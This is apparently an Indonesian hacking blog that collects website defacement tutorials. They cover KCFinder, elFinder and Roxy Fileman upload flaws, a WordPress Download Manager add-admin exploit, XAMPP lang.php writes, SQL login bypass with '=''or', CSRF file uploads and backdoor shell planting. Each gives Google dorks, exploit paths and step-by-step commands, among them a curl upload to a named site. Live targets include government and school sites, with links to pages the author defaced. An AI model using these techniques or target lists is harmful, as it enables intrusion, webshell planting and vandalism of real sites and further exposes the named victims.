Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.

• Apa itu Kcfinder?

     KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.

• Apa itu cURL?

    cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.


Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.

Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,

Bahan :

• Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
• Terminal / CMD 

Tested :

• MAC OS X Yosemite

Step :

1. Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
2. lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
   
3. Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.

Hasil : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml

Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v

Naufal Ardhani - Halo gaes dah lama ga update artikel nihh kali ini saya bakal bagiin Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin), Cocok banget buat Defacer yang suka deface CMS Wordpress Exploit ini cukup mudah tapi cari targetnya yang males karna saya gasuka dorking -_- jadi ditutorial ini gapake livetarget dulu.

Sebelumnya bagi anda yang belum tau apa itu Remote Code Execution simak sedikit penjelasan dibawah,

Remote Code Execution (RCE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.  ( Sumber : FACEBOOK )

Bahan :

• Python ( Untuk Pengguna Windows yang belum terinstall python di cmd silahkan download dan install dulu )
• Script Exploiter ( Ekstensi : Python )

 Dork :

• index of "download-manager"
• index of "download-manager" inurl:/wp
• index of "download-manager" inurl:/wordpress/

Step :

1. Buka Terminal anda
2. Open ke Directory dimana anda menyimpan Exploiternya ( kalau saya di Documents/doc/tools ) jadi commandnya : cd Documents/doc/tools/
   
3. Sudah ketemu exploiter.py nya lalu jalankan dengan command : python exploiter.py
   
4.  Jika sudah mendapatkan taget langsung saja eksekusi dengan command : python exploiter.py -t http://www.site-target.com

SEKEDAR GAMBARAN JIKA BERHASIL

[!] Account Added
[!] Location: http://10.0.0.67/wordpress/wp-login.php
[!] Username: r7Uo4v
[!] Password: YN1G1F

Sekian Artikel Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)

Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.

Dork :

• inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )
  

Exploit :

• www.site.com/[path]/elfinder/elfinder.php.html

Live Target : http://labuankec.pandeglangkab.go.id/

Step :

1. Dorking di google, pilih target dan kasih exploit satu satu
2. dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html
   
3. Langsung aja Upload Shell dengan ekstensi .phtml 
   
4. lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml
   

Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.

nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3

Naufal Ardhani - Hallo gaes kali ini gua bakal bagiin ke-kalian Tutorial Dump Database CMS Balitbang dengan Mudah, Kenapa mudah? ya karna ini inject databasenya pake tools jadi gaperlu manual lagi hehe dan target web yang pake cms balitbang masih banyak yg bisa di inject.

Bahan yang diperlukan :

• Tools ( KLIK INI )
• Akses Shell ( untuk upload tools ini )
• Google Dork ( inurl:/html/index.php site:sch.id )

Live Target : http://www.mandagi.sch.id/

Step :

1. dorking target dulu.
2. masukan url target yang sudah didapatkan.
3. langsung klik inject ( dios sudah otomatis ada )

Jika berhasil akan muncul outputnya

Sekian Tutorial Dump Database CMS Balitbang dengan Mudah semoga bermanfaat yaaa.

Tutorial Cara Deface Metode Effi File Manager - Hai guys kali ini saya ingin memberitahu tentang Tutorial Cara Deface Metode Effi File Manager Upload Shell kalau kalian belom pernah coba poc yang satu ini akan sedikit membuat bingung karna target memakai windows server hehe, kalo udah master lewat aja jangan bully.

Yang Dibutuhkan :

1. ASPX Shell ( khusus untuk windows server ) | Jika belom ada Download disini.
2. Google Dork dan Exploit
3. Pc / Android
4. Kalem Terosss :v

Dork :

• inurl:jquery.tinymce.roxy.fileman ( kembangkan lagi )

Exploit : 

• /jquery.tinymce.roxy.fileman/

Step :

1. Dorking dulu webnya, jika sudah pilih salah satu.
2. kasih exploit, contoh : www.site.com/jquery.tinymce.roxy.fileman/ s
   
3. Lalu Upload Shellnya, misal : shell.aspx, tunggu sampai 100% berhasil.
   
4. Lalu untuk preview Shellnnya, buka www.site.com/jquery.tinymce.roxy.fileman/directory/shell.aspx 
   
5. Sudah seperti gambar diatas? yaudah itu udah terserah kalian, tapi kalau saya menitip file di dir htdocs/index.htm

Hasil : https://redoxomics.febsevents.org/index.htm

Live Target : https://redoxomics.febsevents.org/

Dibuat Oleh : ./E4OXY 

Nb : Saya tidak bertanggung jawab jika terjadi masalah, saya disini hanya membagikan ilmu, dan gunakan sebaik baiknya :)

Naufal Ardhani - Kali in saya akan memberikan Tutorial Deface Xampp Local Write Access, POC ini sedang banyak dipakai oleh defacer defacer karna apa? ntah lah :v karna saya cuma liat show off defacer di grup grup yang ada dan apa keuntunganya? hemmm... keuntungannya ialah bisa mirror di Zone-H :)

Oke Langsung aja

-Dork

• inurl:/security/lang.php
• inurl:/xampp/lang.php

-Exploit

• /xampp/lang.php?Hacked_By_E4OXY ( untuk dir xampp )
• /security/lang.php?Hacked_By_E4OXY ( untuk dir security )

-Preview

• /xampp/lang.tmp ( untuk dir xampp )
• /security/lang.tmp ( untuk dir security )

-Step

1. Dorking dulu, kalau saya menggunakan dork "inurl:/security/lang.php intext:xampp",
2. Beri Exploitnya, contoh "/security/lang.php?Hacked_By_E4OXY" (karna disini saya pakai dork yang inurl:security/lang.php jadi exploitnya juga di dir security),
3. Jika berhasil akan seperti gambar dibawah,
   
4. Untuk Preview hasilnya tinggal beri "/security/lang.tmp", contoh http://vega-apache.ingeneo.co/security/lang.tmp
   

Hasil saya :

http://www.mp-mall.com.hk/security/lang.tmp

http://www.moghulisran.com/security/lang.tmp

http://www.altebagestion.net/security/lang.tmp

http://vega-apache.ingeneo.co/security/lang.tmp

SEKIAN WASSALAM :)

Naufal Ardhani - Hello heker-heker lokal yang berbahagia, di artikel ini saya akan memberikan Tutorial Deface POC Matrimonial Auth Bypass Admin Vulnerability . ada yang udah pernah mencoba POC ini? ya kalau udah.. boleh di baca lagi dan kalau belom ya silahkan dicoba bang.

[+] Demo   : www.teluguchristianmatrimony.com
[+] Dork     : "printprofile.php?id="
[+] U & P   : '=''or'

[+] Step

• Dorking dulu webnya di google atau search engine lain
• Lalu kasi /admin/ contoh www.site.com/admin/ | www.teluguchristianmatrimony.com/admin/
  
• Jika sudah ter redirect ke page login admin masukan username dan password '=''or' seperti di gambar diatas
• Kalau berhasil bypass, kalian akan masuk ke Admin Panel seperti gambar dibawah
  
• Langsung aja ke Web Settings di Site Configuration, ganti semua deh dengan text Hacked by.... atau apalah :v
  
• dan yang terubah hanya title web dll, tapi buat mirror + ngeshoof bisa lah :v untuk tebas index atau upload shell saya belom bisa untuk poc ini karena baru aja saya pelajari kalau sudah bisa upload shell atau jso segera saya upload tutorial selanjutnya

SEKIAN

Naufal Ardhani - Hallo para defacer2 lokal yang berbahagia :v kali ini saya bakal share Tutorial Deface dengan Fake Root banyak yang request tutorial dengan perkataan "Gimana sih cara Deface dengan Fake Root" dan lain sebagainya.

tapi sebelumnya anda harus memiliki shell backdoor yang terpasang di website.... karna apa? ya karna web tersebut yang akan kita reverse ip untuk fake root, oke langsung aja cek dibawah.

Bahan :

1. Shell Backdoor : ( Shell Noname  )
2. Web yang sudah tertanam shell
3. Script Deface ( Klik )

Step :

1. Buka Shell Backdoor Kalian yang sudah tertanam dan Upload Script Deface, misal saya upload  : oxy.php
2. Lalu sekarang kita ke web Reverse IP klik here
3. lalu kalau sudah masukan domain web yang anda sudah di tanamkan shell tanpa https:// dan / contoh : www.google.com
   
4. ambil salah satu domain dan anda kasih tanda /~namauser/namafile.php contoh : site.com /~namauser/namafile.php / site.com /~namauser/namafile.php
5. dan kalau tampilan sudah ter hacked ya berarti berhasil
   

SEKIAN aja yaa, kalau kurang jelas silahkan komen :)

Naufal Ardhani - Hello, kali ini saya akan membagikan Artikel Deface Jbimages TinyMCE Combine 3.04 Vulnerability, method ini banyak sekali target web indonesia akan tetapi sesuai dengan judul method ini hanya bisa upload gambar.


|~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~|
|+~+~+~+~+~+~+~+~+~+~+~+~+~+~~++~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+|
[+]Exploit Title: Jbimages TinyMCE Combine 3.04 Vulnerability
[+]Vendor: http://combine.or.id/
[+]Author: ./E4OXY
[+]Team: Garuda Tersakti 72
[+]Goolge Dork:
 [~]"index of jbimages/ site:id"
 [~]"intext:Powered By combine.or.id"
[+]Exploit:
 [~]/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
[+]Tested on: Mac os X
[+]Live Target:
 [~]sendangadi-sleman.sid.web.id
 [~] www.kelurahan-kampungbaru.info
|~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~|
|+~+~+~+~+~+~+~+~+~+~+~+~+~+~~++~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+|

[+]Step
 [1]Dorking, pilih salah satu web.
 [2]Kasih Exploit, setelah di kasih tampilan akan berubah.
 [3]Lalu upload gambar dengan ext : png/jpg, kalau succes akan muncul tulisan "Upload Complete"
 [4]Untuk Melihat Hasil Upload.
     [~]www.site.com/assets/images/name.jpg
     [~]www.site.com/assets/images/Your_image.png
 [5]Mirrorin deh :)

Screenshot :

Link : http://sendangadi-sleman.sid.web.id/assets/images/OPAL.png

Link2 : http://www.kelurahan-kampungbaru.info/assets/images/OPAL.png

[+]Greetz :
 [~] [ TN72 ] [ ./GH05TW1BL3 ] [ DarkOct02 ] [ xCy4n ]  [ M1NT_1X ] [ Cy#b3r0ne ]
       [ Sese15 ] [ Yukki666 ] [ ./CE.19 ]


[~]Jangan gunakan untuk kesalahan!

 Tutorial Deface Array type files[] with CSRF - Hai guys, kali ini saya akan memberikan Tutorial Deface Array type file[] tapi kali ini defacenya menggunakan CSRF online, oke gausah basa basi langsung aja.

Bahan :

• CSRF ONLINE (KLIK DISINI)
• SCRIPT DEFACE (KLIK DISINI)
• DORK : inurl:.org/server/php

Langkah :

1. Dorking (cari web dulu di gugel.com) gunakan dork diatas cari webnya lewat pencarian gambar ya.
   
2. Klik kanan pada gambar > Open Link New Tab > klik kanan > View Page Source > cari /server/php > kalo ketemu ambil link bagian www.naufalardhani.com/server/php seperti yg di merahin ( contoh http://www.naufalardhani.com/server/php/ganteng/150412_jg.jpeg ).
   
3. Buka CSRF ONLINENYA ( kalau sudah tak tersedia silahkan cari di blog ini csrf html ).
   
4. Isi URL dengan link yg kamu dapatkan ( contoh = http://www.capte.org/server/php/ ) dan Post File diisi dengan files[] > Kunci Target.
   
5. Choose File > Pilih file deface ekstensi: html / htm > Genjo cuks! (upload file)
   
6. Setelah upload akan redirect ke halaman web target > ambil linknya ( contoh = http:\/\/www.capte.org\/server\/php\/archivos\/1\/eue.html )
   

AKSES DEH

LINK = http:\/\/www.capte.org\/server\/php\/archivos\/1\/eue.html

Mirror? Cek Def.Id ./E4OXY

~~ Sekian Terimakasih sudah membaca tutorial deface ini :)

Tags : 

• Tutorial Deface Pemula
• Tutorial Hack Website
• Tutorial menjadi Hacker
• Tutorial deface Array
• Tutorial deface dengan CSRF
• Cara Deface
• Cara jadi hacker
• Hack website

Naufal Ardhani - Hallo pens :v sesuai judul kali ini saya akan share Tutorial Deface Bypass Admin New 2018 kenapa saya memberikan tutorial bypass admin? yakarena metode ini merupakan salah satu metode deface yang mudah bagi para newbie seperti saya.

Bahan :

• Shell Backdoor Extensi .php / .phtml / .php.jpeg / .php.xxx.jpg / .php5 
• Script Deface > KLIK <
• Dork Admin Page

Dork :

• inurl:/admin/login.php
• inurl:/admin/index.php
• inurl:/administration/
• inurl:/admin2/login.php
• inurl:admin2/

Admin Login Username + Password :  '=''or'

Dorknya kalo bisa kembangin sendiri biar dapet web yang masih perawan :v.

Oke Langsung aja ya gausah basa basi :v

1. Dorking dulu webnya di google, kalo saya pakai dork yang "inurl:/admin/login.php"
   
2. Coba satu satu webnya dengan memasukan username dan password : '=''or' sampai dapet web yg vuln,  kalau ga vuln lanjut cari lagi webnya.
   
3. Kalau vuln akan redircet ke admin page. (seperti gambar dibawah)
   
4. Kalau sudah masuk admin page tinggal kita cari uploader untuk upload shell backdoornya, kalau saya sendiri untuk mengupload shellnya di galeri web.
   
5. saya sudah mengupload shell backdoor ./E4OXY yang versi mini.
   
6. Lalu klick PUBLIC_HTML tetapi kalau web yg saya dapatkan tinggal klik domainya '/home/aapki3hy/public_html/deepabaniya.com/'
7. habis tu upload script defacenya, kalo bisa si nitip file aja jangan ngindex kasian adminya :v kalau mau ngindex juga backup dulu indexnya.

Silahkan komen kalau tidak bisa atau send mail

mail : naufalardhani89@gmail.com

HASILNYA

• LINK DEFACE : http://deepabaniya.com/blog.html

~jangan gunakan ini untuk pemerasan admin web, resiko di tanggung sendiri ya karna saya hanya memberikan tutorial ini supaya bisa membantu admin menemukan bug

~Kalau mau deface pasang nick ./E4OXY yaaa :'v